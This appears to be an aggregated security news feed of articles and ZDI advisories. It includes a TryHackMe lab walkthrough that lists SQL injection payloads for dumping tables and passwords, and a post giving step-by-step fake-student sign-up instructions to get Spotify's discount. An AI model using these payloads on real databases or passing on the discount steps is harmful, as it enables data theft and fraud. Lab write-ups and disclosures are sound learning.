government is facing an escalating wave of cyberattacks that have compromised sensitive data and disrupted vital services. The most recent breach was a cyberattack on the U.S. Treasury Department in December 2024, in which Chinese hackers exploited a vulnerability in a third-party cybersecurity provider, BeyondTrust. This breach, attributed to a Chinese Advanced Persistent Threat (APT) group, resulted in unauthorized access to unclassified government documents. The breach has been seen as one of the most significant cyber incidents in recent U.S. history, raising serious concerns about the security of critical government systems. The Treasury Department attack was just the tip of the iceberg. Around the same time, major telecommunications companies, including AT&T and Verizon, fell victim to a massive cyberattack attributed to China. Dubbed “Salt Typhoon,” this hack is believed to be one of the largest intelligence compromises the U.S. has ever faced. Moreover, the U.S. Department of Defense experienced its own security breach in November 2024, in which hackers gained access to sensitive military information. These attacks demonstrate the vulnerability of both government and private-sector systems to increasingly sophisticated adversaries. Musk’s willingness to help address these vulnerabilities is timely and could play a crucial role in strengthening the country’s defenses. The rise in cyberattacks, particularly from state-sponsored hackers linked to China and Russia, highlights the need for stronger cybersecurity measures across all sectors, particularly government infrastructure. Elon Musk’s Unique Offer: A New Approach to Government IT Security? Elon Musk is undoubtedly an influential figure in the tech world, known for pushing the envelope and taking on challenges that others deem impossible. 
His ventures, which include revolutionizing electric vehicles, space exploration, and even pursuing neural technology with projects like Neuralink, have made him one of the most recognized names in technology. Yet, Musk’s approach to business and innovation is often unconventional, which has earned him both admirers and critics. His offer to assist in fixing the U.S. government’s IT systems comes at a time when the need for stronger cybersecurity has never been more apparent. The country is facing an increasing number of cyberattacks, many of which are backed by foreign state actors. These breaches pose a direct threat to national security, compromising everything from sensitive government communications to critical infrastructure. Musk’s expertise in tech and innovation gives him a unique perspective on how to tackle these challenges. His experience with SpaceX, where precision and reliability are paramount, and Tesla, where software and data play key roles in autonomous driving, gives him a deep understanding of the cybersecurity requirements needed to protect complex systems. Musk is known for taking bold, decisive actions to solve problems, often applying unconventional methods. While his offer to help may seem audacious, it also highlights a critical truth: traditional methods of cybersecurity may no longer be sufficient to counter modern, state-sponsored cyberattacks. To Sum Up As Musk pointed out, fixing government IT systems is no small feat. The complexity of government infrastructure, combined with the growing cyberattacks, makes it a daunting challenge. Yet, Musk’s confidence in tackling this issue is a reminder of the urgency with which the U.S. government must address its cybersecurity vulnerabilities. With hackers targeting critical sectors like defense, telecommunications, and finance, it’s clear that a new approach is needed. As the U.S. 
faces an increasingly hostile cyber threat landscape, the question remains: can Elon Musk’s vision and innovative thinking be the solution to strengthening the country’s cybersecurity infrastructure? Only time will tell, but his offer to help fix the nation’s IT systems highlights the critical need for action in the face of rising cyber threats. The conversation around Musk’s potential role in improving U.S. cybersecurity is just beginning, but it’s clear that the stakes couldn’t be higher.
by The Cyber Express
2025-01-20 08:02:57
A week in security (January 13 – January 19)Last week on Malwarebytes Labs: Last week on ThreatDown: Stay safe!
by Malwarebytes Labs
2025-01-20 06:51:10
Anne Neuberger Steps Down as White House Cybersecurity Advisor: What’s Next for U.S. Cyber Defense?Anne Neuberger, the Deputy National Security Advisor for Cyber & Emerging Technology at the National Security Council, The White House, resigned from her position on January 17, 2025. Her resignation sparked an interesting debate over the ongoing cybersecurity landscape in the US. Neuberger’s departure comes at a time when cyber threats, particularly from China, have reached new heights. Under her guidance, the Biden administration made substantial strides in addressing these cyber threats. The primary concerns revolved around China-backed cyberattacks on U.S. infrastructure, including power grids, communication systems, and other vital sectors. Anne Neuberger Resigns from National Security Council One of Neuberger’s major accomplishments was overseeing the launch of the US Cyber Trust Mark program. This initiative aimed to improve security standards for consumer products, helping consumers identify safer products in the marketplace. The program represented a key pillar of the administration’s cybersecurity strategy, which also included two pivotal executive orders on cybersecurity that set the groundwork for future policy development. In line with Neuberger’s work, outgoing President Joe Biden issued an ambitious cybersecurity order on January 16, 2025, aimed at strengthening U.S. government cybersecurity. This executive order, which builds upon plans initiated after the 2021 Colonial Pipeline ransomware attack, includes directives to enhance software and cloud security. These measures are part of the administration’s efforts to protect the country from ongoing cyber threats, particularly those emanating from adversaries like China and Russia. Biden’s cybersecurity order emphasizes the need for software providers and cloud companies to implement secure development practices. 
Agencies like the National Institute of Standards and Technology (NIST), the Cybersecurity and Infrastructure Security Agency (CISA), and the Office of Management and Budget (OMB) will play crucial roles in enforcing these new standards. The executive order also directs the development of new policies for open-source software, requiring security assessments and patching procedures to protect federal systems. The Impact of Chinese Threat Actors Robert Huber, the Chief Security Officer and Head of Research at Tenable Public Sector, commented on the urgency of these measures. He referenced recent attacks, such as the Salt Typhoon and Treasury Department breaches, as stark reminders of the vulnerabilities in current cybersecurity systems. Huber noted that these incidents had not only compromised public trust but also created opportunities for adversaries like China to disrupt critical services and national defense. He praised the Biden administration’s executive order for addressing long-overdue updates in the nation’s cybersecurity infrastructure, especially in regard to third-party software supply chains. As Neuberger departs, the Biden administration’s focus on cybersecurity continues to adapt to new changes. The president’s executive order is expected to have a large impact, particularly in ensuring that federal contractors adhere to better cybersecurity practices. The goal is to create a more secure digital environment for federal systems and communications, reducing the risk of future cyberattacks that could undermine national security. The Biden administration’s final cybersecurity efforts also include measures to protect against threats from climate change. CISA officials, including Jen Easterly and David Mussington, have highlighted the importance of enhancing critical infrastructure resilience in light of environmental challenges. 
This broader approach reflects the growing recognition of cybersecurity as a cross-cutting issue that intersects with national defense, public health, and environmental concerns.
by The Cyber Express
2025-01-20 06:44:37
Microsoft shares temp fix for Outlook crashing when writing emailsMicrosoft has shared a temporary fix for a known issue that causes classic Outlook to crash when writing, replying to, or forwarding an email. [...]
by BleepingComputer
2025-01-20 05:30:53
Decentralization is happening everywhere, so why are crypto wallets “walled gardens”?The twin cryptocurrency and digital identity revolutions are supposed to be building a better future, where anybody can take charge of their sovereignty and security in a world where both face unprecedented threats. Yet at one crucial level, the decentralization ecosystem has a glaring vulnerability: consumer hardware wallets. Devices like Ledger sell themselves as the last word in security for the crypto economy. Most end users will accept those marketing messages, hook, line, and sinker. … More → The post Decentralization is happening everywhere, so why are crypto wallets “walled gardens”? appeared first on Help Net Security.
by Help Net Security
2025-01-20 05:00:51
AI-driven insights transform security preparedness and recoveryIn this Help Net Security interview, Arunava Bag, CTO at Digitate, discusses how organizations can recover digital operations after an incident, prioritize cybersecurity strategies, and secure digital operations with effective frameworks. What measures should organizations take to recover digital operations after an incident? IT security teams everywhere are struggling to meet the scale of actions required to ensure IT operational risk remediation from continually evolving threats. Recovering digital operations after an incident requires a proactive … More → The post AI-driven insights transform security preparedness and recovery appeared first on Help Net Security.
by Help Net Security
2025-01-20 05:00:00
50,000 critical exposures + one of the most vulnerable IT environments: our schools - Kiran Chinnagangannagari, Jeff Smith - ESW #390
by SC Media
2025-01-20 04:30:28
NDR’s role in a modern cybersecurity stackAttacks happen frequently on the security stack or within an enterprise. Often, they’re carried out by some unknown entity on the other side of the globe. You don’t know who you’re dealing with. You don’t know who they are. In this Help Net Security video, Jerry Mancini, NETSCOUT’s Senior Director, Office of the Enterprise CTO, discusses NDR’s role in a modern cybersecurity stack. The post NDR’s role in a modern cybersecurity stack appeared first on Help Net Security.
by Help Net Security
2025-01-20 04:00:38
One in ten GenAI prompts puts sensitive data at riskDespite their potential, many organizations hesitate to fully adopt GenAI tools due to concerns about sensitive data being inadvertently shared and possibly used to train these systems, according to Harmonic. Sensitive data exposure in GenAI prompts A new study, based on tens of thousands of prompts from business users, reveals that nearly one in ten potentially disclose sensitive data. The prompts have been analyzed by Harmonic Security during Q4 of 2024 and monitor the use … More → The post One in ten GenAI prompts puts sensitive data at risk appeared first on Help Net Security.
by Help Net Security
2025-01-20 00:27:43
Planet WGS-804HPT Industrial Switch flaws could be chained to achieve remote code executionCritical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices. The Planet WGS-804HPT industrial switch is used in building and home automation networks to connect Internet of Things (IoT) devices, IP surveillance cameras, and wireless LAN network applications. This switch family is equipped with a […]
by Security Affairs
2025-01-20 00:00:00
ZDI-25-055: Sante PACS Server URL path Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2025-0574.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-054: Sante PACS Server Web Portal DCM File Parsing Directory Traversal Arbitrary File Write VulnerabilityThis vulnerability allows remote attackers to create arbitrary files on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-0572.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-053: Sante PACS Server DCM File Parsing Directory Traversal Arbitrary File Write VulnerabilityThis vulnerability allows remote attackers to create arbitrary files on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-0573.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-052: Sante PACS Server DCM File Parsing Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-0569.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-051: Sante PACS Server Web Portal DCM File Parsing Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-0571.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-050: Sante PACS Server Web Portal DCM File Parsing Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-0570.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-049: Sante PACS Server DCM File Parsing Memory Corruption Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-0568.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-048: Apple WebKit WebCore ContainerNode Use-After-Free Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple WebKit. User interaction is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-27856.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-047: WinZip 7Z File Parsing Out-Of-Bounds Write Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-8811.
by Zero Day Initiative Advisories
2025-01-20 00:00:00
ZDI-25-046: Adobe Photoshop node_modules Uncontrolled Search Path Element Local Privilege Escalation VulnerabilityThis vulnerability allows local attackers to escalate privileges on affected installations of Adobe Photoshop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2025-21127.
by Zero Day Initiative Advisories
2025-01-19 22:27:08
Hackers Claim Breach of Hewlett Packard Enterprise, Lists Data for SaleHacker IntelBroker claims to have breached Hewlett Packard Enterprise (HPE), exposing sensitive data like source code, certificates, and…
by Hackread
2025-01-19 21:29:38
SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 29Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Stealthy Credit Card Skimmer Targets WordPress Checkout Pages via Database Injection Ransomware on ESXi: The mechanization of virtualized attacks FunkSec – Alleged Top Ransomware Group Powered by AI Abusing AWS Native Services: Ransomware Encrypting S3 Buckets […]
by Security Affairs
2025-01-19 20:45:49
Security Affairs newsletter Round 507 by Pierluigi Paganini – INTERNATIONAL EDITIONA new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. U.S. Treasury Sanctions Chinese cybersecurity firm and actor over federal agency breach tied to Salt Typhoon EU privacy […]
by Security Affairs
2025-01-19 19:20:19
A flaw in the W3 Total Cache plugin exposes hundreds of thousands of WordPress sites to attacksA WordPress W3 Total Cache plugin vulnerability could allow attackers to access information from internal services, including metadata on cloud-based apps. A severe vulnerability, tracked as CVE-2024-12365 (CVSS score of 8.5) in the WordPress W3 Total Cache plugin could expose metadata from internal services and cloud apps. The WordPress W3 Total Cache plugin is a […]
by Security Affairs
2025-01-19 17:00:00
The Next Era of Data Security: AI, Cloud, & Compliance - Dimitri Sirota - ESW #390
by SC Media
2025-01-19 16:35:12
THM light walkthrough
TryHackMe Light Walkthrough. Room description: “Welcome to the Light database application! Mode: EASY. I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using nc 10.10.235.64 1337. You can use the username smokey in order to get started.” Room Link: Light (TryHackMe)
Everything seemed fine until the morning after I completed yesterday’s TryHackMe rooms and went to sleep. As the sun rose, I stumbled upon a partially completed writeup by my friend on the “Room Light” challenge on TryHackMe. Intrigued and motivated, I decided to take it on myself. Setting my aim on capturing the flag, I fired up the machine and began my journey. But this wasn’t an easy challenge: it required precision, the right commands, and well-constructed syntax to get anywhere.
Initial Discovery. The only thing that worked perfectly was the hint: nc 10.10.235.64 1337. Entering smokey as the username gave a password: vYQ5ngPpw8AdUmL. This clue set the stage for further enumeration.
Enumeration Phase. Running an Nmap scan revealed two open ports: 22 (SSH) and 1337. At this point, I expected a standard workflow: gather data from port 1337, log in via SSH, and perform privilege escalation. However, this machine had its own twists, deviating from the typical path I anticipated. Working through various commands and reading the errors they produced eventually led me to discover two columns after some trial and error. The columns contained only username and password, nothing else. Using the input
smokey' OR 'a'='a
revealed a password: tF8tj2o94WE4LKC. The OR condition matches every row, and the service only shows one result, so the password shown belongs to whichever row came first; that is why I wasn’t sure who it belonged to, and I continued experimenting to find a more useful query. Note that the service supplies the closing quote itself, which is why every payload below leaves its last string literal open. The real progress began here. After more testing, I discovered a working command:
smokey' UNION SELECT name FROM sqlite_master WHERE type='table
This revealed a table name. Next, I identified the columns, which were crucial for further progress. Then we needed to retrieve the admin username, which was straightforward with the following command:
smokey' UNION SELECT username FROM admintable WHERE username LIKE '%
The next task was to obtain the admin password:
smokey' UNION SELECT password FROM admintable WHERE username = '{adminusername}
I assumed the discovered credentials would allow SSH login, but that turned out to be incorrect. To dig deeper, I checked how many entries the username column held; there were only two:
smokey' UNION SELECT COUNT(username) FROM admintable WHERE '1
A quick realization struck me: since we already knew one username, applying a condition to exclude that name (!=) would retrieve the password of the other user. Since there was only one remaining entry, I was confident it would lead to the flag. With a simple correction to the previous command, the flag was revealed:
smokey' UNION SELECT password FROM admintable WHERE username != '{adminusername}
Eureka! The room has been solved, and the flag has been captured. While the overall experience was enjoyable, hunting for the correct commands was quite frustrating until I finally found the right approach. The restrictions and setup made gaining entry to the room slightly challenging. In the end, this room taught me the value of methodical exploration and the importance of testing different angles when facing unexpected obstacles. It was a rewarding experience that reinforced key concepts in web application security. Good luck with your next challenge! Feel free to reach out whenever you need help. See you next time! 👋
THM light walkthrough was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-19 16:15:32
Spotify’s $60,000+ Security Flaw: Anyone Can Get Student Discounts for Free
Spotify Is Losing Millions. Here’s How Anyone Can Hack Their Student Discount. Imagine paying for a service, only to realize that an easily bypassed verification system allows anyone to access a 50% discount, even if they’re not eligible. This flaw in Spotify’s student discount program could cost them millions of dollars if left unchecked. In this article, we’ll explain how the exploit works, why it poses a significant issue for Spotify, and how it can be fixed before it spirals out of control.
The Shocking Exploit: How Spotify’s Student Discount Is Leaking Money. Spotify’s Student Premium plan offers a 50% discount to students, allowing them to access premium features for just ₹59 per month, compared to the usual ₹129/month price tag. It’s a great deal for students, but here’s the problem: the verification process that ensures only actual students can access the discount is so flawed that anyone can bypass it, and even fraudsters can take advantage. Spotify uses a service called SheerID to authenticate students. The system works by asking for basic student information like an email address and an enrollment number. Once the details are provided, SheerID cross-checks the data to verify the student’s status. On paper, it sounds foolproof. But the reality is quite different. Due to weaknesses in the verification system, anyone can bypass the process by providing fake student details. All it takes is a fabricated email and a random student number, and the discount is yours.
Step 1: Go to the Spotify Student Plan Page. The first thing you’ll need to do is head over to the Spotify Student Premium subscription page. Open your browser and search for “Spotify Student Premium” or directly navigate to Spotify’s student offer page.
Step 2: Enter Fake Student Details. Spotify uses SheerID to verify your student status, but the system only requires basic information, like an email address and an enrollment number. This is where the flaw lies: there’s no real verification behind this data. To exploit the system, simply enter any email address; there’s no requirement for it to be an official student email. Create a random student number (it could be any alphanumeric string) and proceed.
Step 3: Bypass Verification. Once you’ve submitted your fake details, SheerID will verify the information. However, since the system doesn’t cross-check the authenticity of the email or student number, as long as your information looks like it might belong to a student, you’ll be approved.
Step 4: Confirm Your Discounted Plan. After the verification process, you’ll gain access to Spotify’s Student Premium plan at the discounted rate of ₹59/month. You’ll now enjoy all the premium features, including ad-free listening and offline mode, for one year without being a student at all. The worst part? Spotify doesn’t check whether the provided email really matches the student’s enrollment status, and anyone can easily generate a fake student number or email address.
The Financial Fallout: Spotify Is Losing Thousands a Day. Here’s the math behind it: Spotify’s regular Premium subscription costs $9.99/month. The Student Premium plan is just $4.99/month. That’s a $5 loss for every person who exploits the system. If only 1,000 users take advantage of this flaw (a conservative estimate), Spotify could lose $5,000 per month. This adds up to $60,000 a year from just 1,000 fraudulent users. Now, imagine how much Spotify is actually losing as this flaw potentially opens the door to thousands of fraudulent sign-ups. We’re talking about millions of dollars leaking out the door every year if this continues unchecked.
The Real Impact: How This Affects Spotify and Its Users. This isn’t just about losing money; it’s about trust. Legitimate students who are paying for the discount could feel betrayed when they realize anyone can easily access it. This type of exploitation could lead to a growing sense of unfairness and resentment among paying users. Moreover, if news spreads about this flaw, it could damage Spotify’s reputation. Users may lose faith in the platform’s ability to protect its services, and if fraudulent activity becomes widespread, it could lead to a crisis of confidence that’s hard to recover from.
The Bigger Picture: A Global Problem for Spotify. Spotify, one of the most valuable streaming platforms in the world, made €16 billion in revenue in 2024. But even a small leak in their pricing system could result in millions of dollars in lost revenue. This isn’t just an internal issue; it’s a global problem affecting millions of users, including students who rely on discounts to afford premium services. If Spotify doesn’t address this flaw quickly, the financial and reputational damage could spiral out of control. The longer the exploit goes unaddressed, the larger the scale of the problem will become.
The Hidden Cost of Not Fixing This Flaw. Spotify is essentially leaving the door wide open for fraudulent users to walk right in and get access to premium services for a fraction of the cost. If the platform doesn’t act quickly, this problem could grow into a full-scale financial crisis. With users all over the world potentially taking advantage of this loophole, the total losses could add up to millions of dollars each year, money that Spotify will never get back.
Conclusion: The Clock Is Ticking. In just a few minutes, you can bypass Spotify’s student verification and get a 50% discount on your Premium account. But while this exploit is easy to execute, it’s also a serious problem for Spotify.
Disclaimer: Spotify has a significant vulnerability in its system that could easily cost them millions of dollars. The exploit is simple, but it comes with serious financial and reputational risks if left unchecked. This guide is intended for educational purposes only. 
Readers are strongly advised not to exploit the flaw, as doing so violates Spotify’s terms of service and could result in account penalties. We urge Spotify to address this issue before it grows into a larger crisis. Oh, and just to add a little cherry on top — I did report this issue to Spotify’s bug bounty program.The question is: How long will it take for Spotify to realize this flaw and fix it before the damage becomes irreversible?Spotify’s $60,000+ Security Flaw: Anyone Can Get Student Discounts for Free was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-19 16:00:00
Employees of failed startups are at special risk of stolen personal data through old Google loginsAs if losing your job when the startup you work for collapses isn’t bad enough, now a security researcher has found that employees at failed startups are at particular risk of having their data stolen. This ranges from their private Slack messages to Social Security numbers and, potentially, bank accounts. The researcher who discovered the […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-19 14:08:07
TikTok is back up in the US after Trump says he will extend deadlineTikTok is back up in the United States after Trump announced today that he would extend a 90-day deadline for the company to find a U.S. purchaser. [...]
by BleepingComputer
2025-01-19 11:56:49
TikTok shuts down in the US as Trump throws the company a lifelineTikTok shut down in the U.S. late Saturday night following the Supreme Court's decision to uphold the law that banned the company over national security concerns. [...]
by BleepingComputer
2025-01-19 10:54:00
TikTok Goes Dark in the U.S. as Federal Ban Takes Effect January 19, 2025Popular video-sharing social network TikTok has officially gone dark in the United States, as a federal ban on the app comes into effect on January 19, 2025. "We regret that a U.S. law banning TikTok will take effect on January 19 and force us to make our services temporarily unavailable," the company said in a pop-up message. "We're working to restore our service in the U.S. as soon as possible
by The Hacker News
2025-01-19 10:23:46
Star Blizzard hackers abuse WhatsApp to target high-value diplomatsRussian nation-state actor Star Blizzard has been running a new spear-phishing campaign to compromise WhatsApp accounts of targets in government, diplomacy, defense policy, international relations, and Ukraine aid organizations. [...]
by BleepingComputer
2025-01-19 09:00:20
Week in review: AWS S3 data encrypted without ransomware, data of 15k Fortinet firewalls leakedHere’s an overview of some of last week’s most interesting news, articles, interviews and videos: Attackers are encrypting AWS S3 data without using ransomware A ransomware gang dubbed Codefinger is encrypting data stored in target organizations’ AWS S3 buckets with AWS’s server-side encryption option with customer-provided keys (SSE-C), and asking for money to hand over the key they used. Configuration files for 15,000 Fortinet firewalls leaked. Are yours among them? A threat actor has leaked … More → The post Week in review: AWS S3 data encrypted without ransomware, data of 15k Fortinet firewalls leaked appeared first on Help Net Security.
by Help Net Security
2025-01-19 05:39:26
How to Get Around the US TikTok BanTikTok is now unavailable in the United States—and getting around the ban isn’t as simple as using a VPN. Here’s what you need to know.
by WIRED Security News
2025-01-19 00:00:00
ZDI-25-045: 7-Zip Mark-of-the-Web Bypass VulnerabilityThis vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.0. The following CVEs are assigned: CVE-2025-0411.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-044: Ivanti Avalanche SecureFilter Authentication Bypass VulnerabilityThis vulnerability allows remote attackers to partially bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-13179.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-043: Ivanti Avalanche Faces ResourceManager Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13180.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-042: Ivanti Avalanche SecureFilter allowPassThrough Authentication Bypass VulnerabilityThis vulnerability allows remote attackers to partially bypass authentication on affected installations of Ivanti Avalanche. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2024-13181.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-041: Ivanti Endpoint Manager updateAssetInfo SQL Injection Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-13162.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-040: Ivanti Endpoint Manager DecodeBase64Object Deserialization of Untrusted Data Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13163.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-039: Ivanti Endpoint Manager AlertService Uninitialized Memory Information Disclosure VulnerabilityThis vulnerability allows local attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.2. The following CVEs are assigned: CVE-2024-13164.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-038: Ivanti Endpoint Manager Improper Input Validation AlertService Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13165.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-037: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13166.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-036: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13167.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-035: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13168.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-034: Ivanti Endpoint Manager AlertService Type Confusion Information Disclosure VulnerabilityThis vulnerability allows local attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2024-13169.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-033: Ivanti Endpoint Manager AlertService Improper Input Validation Denial-of-Service VulnerabilityThis vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2024-13170.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-032: Ivanti Endpoint Manager HIIDriver Improper Verification of Cryptographic Signature Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-13172.
by Zero Day Initiative Advisories
2025-01-19 00:00:00
ZDI-25-031: Ivanti Endpoint Manager MyResolveEventHandler Untrusted Search Path Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-13158.
by Zero Day Initiative Advisories
2025-01-18 18:33:19
U.S. Treasury Sanctions Chinese cybersecurity firm and actor over federal agency breach tied to Salt TyphoonThe U.S. Treasury’s OFAC sanctioned a Chinese cybersecurity firm and a Shanghai cyber actor for ties to Salt Typhoon and a federal agency breach. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned Chinese firm Sichuan Juxinhe Network Technology Co., LTD., for its involvement in the activities of the Salt Typhoon APT group, […]
by Security Affairs
2025-01-18 15:27:12
DOJ confirms arrested US Army soldier is linked to AT&T and Verizon hacksThe alleged hacker claimed to have access to huge amounts of call records, including VP Kamala Harris and President Trump.
by TechCrunch
2025-01-18 15:12:00
You need a router-based VPN in 2025. Here's why and how to set one upUsing a VPN alone is no longer enough. Here's how to pair the WireGuard protocol with your favorite VPN to protect your entire network.
by ZDNET Security
2025-01-18 12:00:00
Treasury Levels Sanctions Tied to a Massive Hack of Telecom Companies and Breach of Its Own NetworkThe Treasury Department announced sanctions in connection with a massive Chinese hack of American telecommunications companies and a breach of its own computer network. The post Treasury Levels Sanctions Tied to a Massive Hack of Telecom Companies and Breach of Its Own Network appeared first on SecurityWeek.
by SecurityWeek
2025-01-18 12:00:00
How victims of PowerSchool’s data breach helped each other investigate ‘massive’ hackSchool workers say they resorted to crowdsourcing help among each other following PowerSchool's breach, fueled by solidarity and the slow response from PowerSchool.
by TechCrunch
2025-01-18 11:36:00
U.S. Sanctions Chinese Cybersecurity Firm Over Treasury Hack Tied to Salt TyphoonThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency. "People's Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent
by The Hacker News
2025-01-18 11:30:00
US Names One of the Hackers Allegedly Behind Massive Salt Typhoon BreachesPlus: New details emerge about China’s cyber espionage against the US, the FBI remotely uninstalls malware on 4,200 US devices, and victims of the PowerSchool edtech breach reveal what hackers stole.
by WIRED Security News
2025-01-18 11:17:28
